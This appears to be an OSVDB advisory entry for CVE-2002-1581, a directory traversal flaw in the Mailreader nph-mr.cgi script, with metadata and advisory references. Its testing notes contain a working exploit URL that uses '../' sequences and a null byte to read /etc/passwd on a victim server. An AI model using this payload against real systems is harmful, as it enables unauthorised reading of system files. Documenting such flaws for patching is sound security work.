Mailreader nph-mr.cgi Traversal Arbitrary File Access

2002-10-28T05:11:20
ID OSVDB:8192
Type osvdb
Reporter OSVDB
Modified 2002-10-28T05:11:20

Description

Manual Testing Notes

http://[victim]/cgi-bin/nph-mr.cgi?do=loginhelp&configLanguage=../../../../../../../../../../etc/passwd%00

References:

Secunia Advisory ID:12143 Other Advisory URL: http://lists.debian.org/debian-security-announce/debian-security-announce-2004/msg00135.html Keyword: Directory Traversal ISS X-Force ID: 10490 CVE-2002-1581 Bugtraq ID: 6055